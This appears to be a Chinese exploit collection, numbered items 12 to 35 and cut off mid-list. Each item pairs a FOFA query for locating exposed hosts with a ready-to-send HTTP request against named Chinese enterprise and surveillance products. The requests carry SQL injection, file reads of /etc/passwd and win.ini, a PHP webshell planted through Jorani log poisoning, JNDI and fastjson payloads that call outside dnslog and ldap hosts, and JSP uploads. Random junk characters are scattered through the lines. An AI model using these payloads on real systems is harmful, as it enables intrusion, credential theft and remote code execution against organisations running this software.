FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
+ ^4 @- k$ h; M/ }1 m; v1 v/ fGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
4 P, p: x. K* B. W+ \) THost: 127.0.0.1
. K) |" H+ i* oPragma: no-cache
' ]" G; V0 k. ]: C. i9 PCache-Control: no-cache( C4 I" N* b$ J# Z- ]
Upgrade-Insecure-Requests: 1% A- C& B- z: f+ A8 v( @5 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- Q# O& T5 v6 F- {2 s( EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ {5 a$ m2 @9 ?! hAccept-Encoding: gzip, deflate2 @! x$ h% x9 W4 H9 o
Accept-Language: zh-CN,zh;q=0.9,en;q=0.86 C; w/ S4 m; M7 y/ B9 I# Z3 s7 I& k4 d
Connection: close
# u4 b" G) t; w k) N& e& ?* f; _' l8 W
% D k/ m( v, t @/ e3 T% U T12. Jorani < 1.0.2 远程命令执行' Y- B/ O, N2 U! C+ w4 w
FOFA:title="Jorani"
3 U# D1 ?: g R+ \" o6 |第一步先拿到cookie3 r! T8 _+ ]+ N
GET /session/login HTTP/1.1
9 z2 N; z8 p2 I& ^! nHost: 192.168.190.305 ~7 w" h! G* n: L U" h) T9 Z
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
! r) X6 O# X6 r1 f5 n# LConnection: close
/ `, T8 U4 }1 s5 JAccept-Encoding: gzip5 _ s& Y3 E0 A3 C
5 J# N; {6 b) i0 W, {
' d; G' A( t% ~! \: K8 c/ f7 ^% k
响应中csrf_cookie_jorani用于后续请求
6 h* o" H9 X: A# B5 \0 t0 ZHTTP/1.1 200 OK
8 X7 R$ P- O! T+ R0 C& CConnection: close
, X4 l) N) e1 V: L2 T9 ECache-Control: no-store, no-cache, must-revalidate
# C: k! `" @# S) {; Q9 Q7 L6 fContent-Type: text/html; charset=UTF-8
3 M- V0 j4 }+ v& ?Date: Tue, 24 Oct 2023 09:34:28 GMT$ \" q" }, B' G' {. v4 R: l/ k$ c
Expires: Thu, 19 Nov 1981 08:52:00 GMT
8 Z% |% N6 x& t) N* P5 q8 hLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT) o' n" Z' f P# @
Pragma: no-cache
0 x# G4 \2 L2 v* T" M9 lServer: Apache/2.4.54 (Debian)
$ i0 u3 l6 J9 N6 w) dSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/# }! }0 s& G2 G) J* ` \/ L# B6 F
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
4 o; _) k k( I$ EVary: Accept-Encoding- D/ m6 U3 }9 `; Y1 T' u& `
/ u# U- A4 }. o6 O3 V; V! B/ _% {
5 B9 J/ V& V) w* m: l- b" ]POST请求,执行函数并进行base64编码3 ]$ t/ _+ q+ u4 I" d
POST /session/login HTTP/1.1) K1 |) O y2 p) K- l
Host: 192.168.190.301 ~) n1 G6 S1 Q' A$ Q# i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.360 J- K& ^- i* `/ `9 Q
Connection: close
' m" [ p [6 Y1 M6 sContent-Length: 252
* Y( F) Z# P% B7 v$ GContent-Type: application/x-www-form-urlencoded
' W# [5 H/ b+ Y) W+ n, `Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r5 H/ m6 o9 ^2 h/ n s q% G
Accept-Encoding: gzip3 v+ m" O! l0 U! Y
) c& N! N" J( Z& J0 ~& @+ h$ Q
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor3 n$ R: ^& C6 p) m
# v8 P/ Q! G' E3 B% P! K
: J' l$ E9 q9 i" Q- X, A
0 s9 l: _2 O4 W% w向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串/ a. }( |: y8 {) \
GET /pages/view/log-2023-10-24 HTTP/1.1
1 ~( n; T" E, D% c! OHost: 192.168.190.30$ o7 M! E$ D8 V0 C0 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ \* ]& U/ @, H% b, FConnection: close
1 X {& o4 ?6 WCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r( Y- W: I) ?3 P- O r$ m% g
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=8 t' x0 |+ C! d
X-REQUESTED-WITH: XMLHttpRequest( Y# O' \4 F+ ?" U. }& s
Accept-Encoding: gzip
1 w/ U3 `5 N7 k! o9 }* g9 k1 n$ ]/ C, O+ I* J
" }! A2 D: e$ F8 m/ o/ @
13. 红帆iOffice ioFileDown任意文件读取 ?; x3 u) d* ^$ v
FOFA:app="红帆-ioffice"9 U6 o2 P( i" a: S% b$ x9 T. P( q
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
" t6 I: W" ~; k' Q! NHost: x.x.x.x
- |5 i9 {( }$ r/ MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' s4 {/ x- b- M$ S+ Q- @$ zConnection: close3 ]4 a& ?$ _5 @3 R m3 i
Accept: */*
( _7 A: S1 y$ c& X$ bAccept-Encoding: gzip
2 k4 L* {6 v; A2 Q" l
( G3 P' k1 ~4 [. ~3 V) l: ~ A; t: e% W" o; P
14. 华夏ERP(jshERP)敏感信息泄露( h! d- I( o9 g1 {
FOFA:body="jshERP-boot"
" E& Q) p' s* r/ R6 p* ]" s泄露内容包括用户名密码. L( q9 z; h/ k j% I
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
+ p! q+ u3 B: S, H4 aHost: x.x.x.x6 i$ j1 \; {* i: Y+ P% A* R% T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
7 ^% V) j0 ?8 |" _0 PConnection: close
) u9 p( M9 b6 Z& R/ E8 QAccept: */*
1 K8 G1 R5 g! ^Accept-Language: en, G; c% B. p. J5 U' l' f
Accept-Encoding: gzip; `; y" B9 D8 S2 |% f, N0 d
2 a7 {4 W- z8 m/ M2 y# B6 X3 h, G( U
5 N6 [: d$ O$ h) \" x* U9 x- W0 B& r! A! M15. 华夏ERP getAllList信息泄露 L6 y* |, V5 c! U7 ^1 X/ O( S" O! Q9 |
CVE-2024-0490
2 W* v' t: I+ |, A3 fFOFA:body="jshERP-boot"1 @. q' d6 V3 c* V4 o
泄露内容包括用户名密码" B; i; W4 ~& n. M v
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1- j6 ~( e' I) _+ K8 U7 y# p6 W
Host: 192.168.40.130:1004 @* |) r5 a3 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36/ d h0 @. r1 R, I* N. J$ M
Connection: close
7 l* Z- {6 a. g: ~7 O5 mAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8 G! j( { N0 q8 g
Accept-Language: en5 ^- n! W5 c9 q3 L) E
sec-ch-ua-platform: Windows1 a$ w1 x, }5 h
Accept-Encoding: gzip5 i, l% D) W8 f5 k* [9 J
; { D5 E0 Z" T) F) g* h6 U3 @& u; M* C2 Y. D2 N1 J1 j9 w& ~
16. 红帆HFOffice医微云SQL注入
( ?0 y; m( V* h1 o5 g# {5 }" W0 AFOFA:title="HFOffice". n7 a( s0 }% W* D/ R: @8 Z
poc中调用函数计算1234的md5值
$ } L H9 E9 _8 F/ FGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
' G+ v" ]- ^3 {8 [& @5 l$ ~Host: x.x.x.x
( x- \0 P! U7 }1 Z8 n2 x; UUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36; X/ r- c# e0 I% h
Connection: close
; W9 }: @( X% w0 aAccept: */*) D8 m/ r7 Z4 w4 X
Accept-Language: en& V# v8 a4 Z: W" c; M
Accept-Encoding: gzip
3 x! Y" I( B& H. X: n% [0 l( K r( t4 ~8 B+ k3 }. x
- p* C; j1 { t; [4 ?% U17. 大华 DSS itcBulletin SQL 注入5 o' r5 j5 S+ E: h
FOFA:app="dahua-DSS"
' K0 g$ ~8 R; [6 vPOST /portal/services/itcBulletin?wsdl HTTP/1.1
5 r0 z. Q6 `. T7 v2 M: O) {Host: x.x.x.x
2 C" `- N! S g" W( VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( {3 s: [- Q3 |2 I" P u/ U* ~8 a$ w- g
Connection: close) v' x. P6 ?! P, B
Content-Length: 345
5 h9 `* J1 ]& S; Q5 {Accept-Encoding: gzip6 S0 e! j3 V% c( [# u
+ S7 o6 n2 q- C2 y
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>$ i2 D/ t- o1 C# j% Q2 }
<s11:Body>
# ]" o1 p2 n% ] Z <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
4 Z A8 R2 _' d+ M5 e3 T O <netMarkings>, ]" N/ }& @5 u& \
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
4 v, ^& Q. W# a; G1 M8 A </netMarkings>
3 w8 B: B" Y! n, w- H </ns1:deleteBulletin>: h; M; t$ r; N1 q# |3 c
</s11:Body>
& Z3 q f- Z- f8 G0 s# k) @6 J</s11:Envelope>
0 D4 v5 y G: o; ?! ]# I
2 Y1 E+ c2 O6 z* h! f9 \3 x" M7 ?" f2 g/ |) k" P$ {
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露 ?- t3 c' V: T
FOFA:app="dahua-DSS"; S3 N1 {# I* P' B- `
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1. ^8 c0 W+ I* K9 `
Host: your-ip
8 Z/ A( ~8 }6 r. A8 @! DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. ~2 w- K; \$ L4 I+ _, ]Accept-Encoding: gzip, deflate! C: S. I( ~: ~" p2 J' ~
Accept: */*6 V5 V+ K8 G% ?/ H" e
Connection: keep-alive. |3 r" M- K/ \3 @* I( ?/ x* q
: `* E4 V9 ]3 n
, j+ D" _, f! L' F9 U( D- v2 Q/ A5 K0 d( t- l
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入 g" n+ ?2 x" w6 F/ u9 H; `
FOFA:app="dahua-DSS"
( M. y5 X8 s6 }' F( t MGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
# G, d$ A3 B7 UHost:
9 V W0 n& B- l) N; _User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, t& n' }- b, g8 ]8 I$ t: a
Accept-Encoding: gzip, deflate
) f, `" C7 R( w z0 C! KAccept: */*
$ F# ]! M8 r% [: L( ~: {Connection: keep-alive3 P* i7 n8 L$ l+ E, t* x; [
Z2 |+ R5 p1 E+ f: N
t; i) d+ ?+ _& i4 U1 j4 N20. 大华ICC智能物联综合管理平台任意文件读取3 U4 G9 k8 c; E; [6 b: e# Y( \* J
FOFA:body="*客户端会小于800*"- n: }" o. |' X6 Y: [$ F
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1; R3 } J; [- ]* c
Host: x.x.x.x* P1 p+ Y# o# \! u1 ~) m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 v x9 `( A) C) O) d# o7 Q. a
Connection: close
7 f5 b! T6 C LAccept: */*
% x. T; B/ O2 \" B4 S! {: e3 P. iAccept-Language: en
! g- [9 h- r- H0 E& YAccept-Encoding: gzip
0 v1 k; ?. `8 d" S* d" d4 _- u
1 E5 b0 f9 q) ]2 R; _% w" W
' X8 N2 x: a8 Z. f0 w% u21. 大华ICC智能物联综合管理平台random远程代码执行: w1 \4 k& |& l" M% p8 K! ^
FOFA:icon_hash="-1935899595") }4 v) s1 S- ?5 g
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1: D6 e/ v: A! ~" s. n2 g
Host: x.x.x.x
9 \+ @! G, O: r1 m- YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 q+ I+ w" y7 M8 N+ xContent-Length: 161( E0 O4 |+ r0 L
Accept-Encoding: gzip
' l- j+ O a+ k( K! FConnection: close; H3 R, K s4 V- b
Content-Type: application/json;charset=utf-8
; z+ ~- y2 N4 g. z2 Q( D6 [; J% O& I! \2 q
{1 _8 O1 t6 Y9 f8 `/ K$ W" Q* ?
"a":{
1 b$ K* K* q9 @) j "@type":"com.alibaba.fastjson.JSONObject"," ]0 K( a! P1 h7 }
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}. [) c/ n9 `/ u2 h
}"", P u+ U' g/ c C. e. r- |6 R" o
}
9 @' j( r F) n0 t7 c: O' ?" J @. i P
- Y. J/ Y8 ~9 ]2 S7 w, o5 T22. 大华ICC智能物联综合管理平台 log4j远程代码执行1 d* {5 j+ C. l
FOFA:icon_hash="-1935899595"
+ |% o9 o0 Z) q4 D1 KPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
, }3 a! u9 N! q/ S ]& oHost: your-ip- [5 U* ?5 w; y* ~* v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 y2 J$ H1 t2 }6 `
Content-Type: application/json;charset=utf-86 O! W- p0 q# M3 e" O
S% Q" W( H" h5 Q' u9 u a
{6 ]7 x( r$ c) c! W- j( q; D
"loginName":"${jndi:ldap://dnslog}"9 T0 k% ]7 ~; H5 t% B6 h
}
! D7 \( c9 q% a. c- O9 H0 N+ x; A6 a) v/ E" |$ P5 \3 e, E" D" k
$ d# v4 z% d) G# A3 o* g! g8 g5 S/ M
* y4 c6 e B1 t' w2 `
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
3 n% r1 {$ q! w% w6 VFOFA:icon_hash="-1935899595"
T( Z5 @- n6 ]" fPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
2 o5 e: ]' M/ D7 hHost: your-ip
5 y- q/ a, ` P1 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, s! t' E1 u5 G
Content-Type: application/json;charset=utf-8; Y) Y1 C! M; z$ }
Accept-Encoding: gzip5 |- m& ~5 ^: k+ |
Connection: close W. I2 b i. X: i
r- L' s8 i1 I/ x* L. L& a{5 \+ S6 y, A* v9 G. V. I5 V4 r) Y
"a":{
7 A6 f6 B" w5 S! r+ H "@type":"com.alibaba.fastjson.JSONObject",2 P8 }, I5 N# H. Y& z. |4 c
{"@type":"java.net.URL","val":"http://DNSLOG"}, ^: L0 X0 z3 m6 Y
}""
# i( b& ~5 j, {$ `( |- y! Y}5 y5 a& |2 I1 Z% ^8 ~0 f
2 e) m3 J& z. [( [' q
& J* u. J# n! |: d; W
24. 用友NC 6.5 accept.jsp任意文件上传9 ?) L: o; F6 S6 {- j
FOFA:icon_hash="1085941792", E! }2 ^1 V5 {6 [1 S
POST /aim/equipmap/accept.jsp HTTP/1.1
! g' t) q' }, n2 dHost: x.x.x.x) c- o) r% D$ e t2 u/ o' a {3 {
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
- o6 h! r# a I! b3 n( N7 Y! O' x+ aConnection: close
2 ^+ w/ S2 G3 t' m7 e3 o9 L8 jContent-Length: 4490 B3 Z0 n8 x4 |: m0 g
Accept: */* @! H2 ^2 ]2 E8 d8 V0 ?& C* _
Accept-Encoding: gzip0 ?" z& X! ]0 U& i! F7 x+ J/ Q
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! L3 m7 g- G; i
' u R8 p. E1 g( e, B+ d. y
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
. y5 F& I4 h- lContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
7 c. L7 ~! x( ^# oContent-Type: text/plain
+ M f: J. s4 f6 s* v8 T7 Y$ e% ~; p4 F3 |) c
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>% ]# I( v, O4 O& E9 D
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc2 m8 L3 V N2 v0 c/ q8 k
Content-Disposition: form-data; name="fname"
- S( D/ q+ v( t3 g) z Z" I* e# D' h C
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp$ {2 J( r2 m, t. ?% {
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--; o9 @9 Y# E- Y# n6 l3 g
4 B, d% y. W% \: e
, C `$ Y5 g% R1 T7 n- U2 X
25. 用友NC registerServlet JNDI 远程代码执行. @1 g% }. Y" M
FOFA:app="用友-UFIDA-NC"
: y/ p% Y( ^! S( s6 _POST /portal/registerServlet HTTP/1.1
% j% a4 R, ~6 F ^* \Host: your-ip1 k u: [7 t7 w5 H) _) R6 g5 m$ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0' n2 U1 P$ c; ^" q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9; x8 `$ M f8 e$ h# I7 O/ G
Accept-Encoding: gzip, deflate; U$ R9 b( u7 H5 i0 K, k8 c% Y
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6% X4 \1 I( p/ l2 n
Content-Type: application/x-www-form-urlencoded. G) c5 N& p) i( Y* _- V$ [
, r3 G3 t" K% ^6 v0 t9 S- e% V. L
type=1&dsname=ldap://dnslog/ p5 m" M: A1 `: H |
: i! O+ H+ n3 j7 a
0 j W9 W4 H! z' C7 i5 d% Z
6 i" ^% G5 [, i" P A- E26. 用友NC linkVoucher SQL注入% v% o2 ~+ J2 T% z
FOFA:app="用友-UFIDA-NC"$ m" t9 T% L$ D, Q# g
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1# Q3 f$ I$ ~0 K0 ?
Host: your-ip& L' {+ U, `6 h5 H& n, T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% Y# S9 B1 j! `* N/ s- \
Content-Type: application/x-www-form-urlencoded+ O4 _2 e) k8 g4 w% r \
Accept-Encoding: gzip, deflate. b* w! m- ]6 X0 H% R" F) o
Accept: */*6 b6 |5 d" \$ m2 p
Connection: keep-alive2 N5 ^3 [( R! y" B6 O$ E/ W( k e
) X& a$ a! A/ ] d6 P, N
* g) w2 i# _/ Y# { \1 k h7 M- d27. 用友 NC showcontent SQL注入
0 A2 U& W6 y G3 `0 X1 FFOFA:icon_hash="1085941792"1 u1 g' u$ Y4 t
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1- h1 X+ @& F! ^$ e0 E, s' c
Host: your-ip
0 D3 u0 ^3 V/ S( F5 j) tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 H$ n, h( P6 U% D) BAccept-Encoding: identity
$ V; G! K+ M4 P6 GConnection: close/ @3 H b/ l Y4 |7 @' o. s
Content-Type: text/xml; charset=utf-8
6 E: S/ D( x Q* X+ y
O! i, V7 x# R0 u6 \+ r& m+ _8 K! L& |, W( r
28. 用友NC grouptemplet 任意文件上传
. W) H+ L V0 YFOFA:icon_hash="1085941792"
- L8 e, A) W: M: TPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.17 g' b; z3 h, ]" I
Host: x.x.x.x0 O7 I* w8 [* A; I6 \. O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.362 B N1 j0 E5 Q
Connection: close
- Y3 d- P" H0 p; |Content-Length: 268
8 _4 [3 _0 }# AContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
, k* Y) w+ y6 j8 E: N7 GAccept-Encoding: gzip3 Y$ I( A) P$ ?& P$ [+ R1 z( Y
( z# B1 t6 P/ M$ N0 s1 q" J
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk; t! M! P: Y7 {# t1 B
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"4 g7 M0 g3 m0 h: r [
Content-Type: application/octet-stream; Y$ L: L9 V0 q2 P1 ^: M$ o, |/ `
/ z- [( e! Q7 T: A$ _<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
" m* L7 c9 h( x" _( B1 k------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--; Y+ a/ c% m* x' s' i2 V
7 a5 t. n* ^( t1 E* i0 d
/ w5 a6 l6 i% d7 y }* t% G/uapim/static/pages/nc/head.jsp+ G: N( l, j9 p/ w' v! [/ `
d- k, j1 m ?" @
29. 用友NC down/bill SQL注入8 [$ J5 c( ^. x
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"" X/ r# |& B2 {% F7 ]
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
5 L0 i" L2 y; Q J9 d' QHost: your-ip
3 J! H: a0 [: q# t' ]2 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, H) w/ N- X4 B1 v% v3 B. H2 EContent-Type: application/x-www-form-urlencoded# D) O- U% M( z- Z/ E# g& m1 _
Accept-Encoding: gzip, deflate- T$ |. I3 G# ?% S3 x" ?
Accept: */*
' ^' F, a/ ]% A) ?+ ]: X+ Q% KConnection: keep-alive, S( P+ ]2 U7 E2 s/ a6 @# v- I% X
# \0 n. A8 j2 l! C3 z) ?* x8 J
7 w ^, f7 K( I2 W7 b: I+ y
30. 用友NC importPml SQL注入. I2 D, w7 i7 o O
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"7 g$ v' L6 y; H
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
$ N6 \5 l8 V0 D. @- t8 e" `Host: your-ip
* q; S! }) o! w; W& V& WContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
( |& }; e8 w) i" kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
1 n% I/ x; V' U: g8 v3 t1 }- `1 Z) bConnection: close7 L6 R3 q+ ~* J& V2 d2 z
8 v( O7 ?. W/ m" C$ K* v; S' r' e
------WebKitFormBoundaryH970hbttBhoCyj9V! \3 Q0 O, q# k6 i; p- J8 x
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
$ s0 V! U- B0 B/ z/ ^6 ^8 w5 }& ~Content-Type: image/jpeg7 m; B, x; H1 D3 Y6 m& G6 j
------WebKitFormBoundaryH970hbttBhoCyj9V--
+ b) I% v5 o2 D3 i i2 [0 \3 Z0 A( Z2 r, f6 k
5 x/ ^, Z0 |) U) j' p
31. 用友NC runStateServlet SQL注入
! t- |0 Y& @" ?4 ?version<=6.5) j3 |' N; b) V# o
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% b( e: Y/ S; i: R- _. n! fGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1; B# p, y \+ x
Host: host2 T5 Q$ k* w* M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
9 I& J1 B8 L# l8 iContent-Type: application/x-www-form-urlencoded
# M' ?( J' B% _* t- s, c0 \! t0 O
* m0 N( a! ?2 B6 A* _; t! d: S% p Y; v: N7 b z6 e
32. 用友NC complainbilldetail SQL注入
5 D1 }. k/ z4 R$ ?! r. B% e5 i; hversion= NC633、NC65, x; O% n6 ^3 D: z" A% O
FOFA:app="用友-UFIDA-NC"
/ B4 U' n& N: p' E6 [GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( I) J; e/ B. h4 d9 { gHost: your-ip* e! }5 |' s% h( N4 w; v, G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" ~/ s0 o* _7 sContent-Type: application/x-www-form-urlencoded3 l# _- k2 n' G7 x" Q* e
Accept-Encoding: gzip, deflate
5 c+ z- G: J1 w3 J) CAccept: */* I4 e$ v0 W' d. g* }
Connection: keep-alive
3 P4 F7 X9 a2 Q" K; L, j
G) _1 K1 Q: j& k" I, J. o C1 ^) S1 S
33. 用友NC downTax/download SQL注入
% W' r$ C2 @" R" g; `' q+ `version:NC6.5FOFA:app="用友-UFIDA-NC"
4 s, ~8 O+ `# e4 V5 r& AGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.11 Z, t- Z/ }7 t& {3 h* V# E9 H k
Host: your-ip
( V4 |+ P3 E8 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& {- ?" o, Y) {" ~* O
Content-Type: application/x-www-form-urlencoded
# R% n1 z5 B; yAccept-Encoding: gzip, deflate
9 y7 u( u# Q5 R [7 ~: |, B" WAccept: */*
7 _( D' S+ K$ u& z& o3 Y/ @0 QConnection: keep-alive h: B" I0 q$ L0 L& F8 _0 \
/ Q) l6 B5 }3 M# I, w( {
4 N" z$ T9 m! O' C34. 用友NC warningDetailInfo接口SQL注入
, I N8 ? ]+ r/ LFOFA:app="用友-UFIDA-NC": B" ]6 M& s9 n- r j
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1, B6 z" l( |! r! u3 ]! c
Host: your-ip& V/ }- l$ L2 I; X6 C$ J; \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 N8 O3 x0 r* X' X% `6 NContent-Type: application/x-www-form-urlencoded
, ]2 d" g+ B W: Z( ~! i, U; r6 i. Z8 SAccept-Encoding: gzip, deflate1 e- _# ]6 Z: T4 j* ~6 L* w5 {1 q
Accept: */*
. ?& o# [+ c6 q3 mConnection: keep-alive
) H1 ~& ^; k) q; J2 O. e) X
0 T- G# I8 |+ P; v; q! _; n: W# ^) V! u7 r% x3 @3 O: c
35. 用友NC-Cloud importhttpscer任意文件上传' N8 r( [- X- y4 ]% u
FOFA:app="用友-NC-Cloud") W7 ?, B. q) }% L8 T
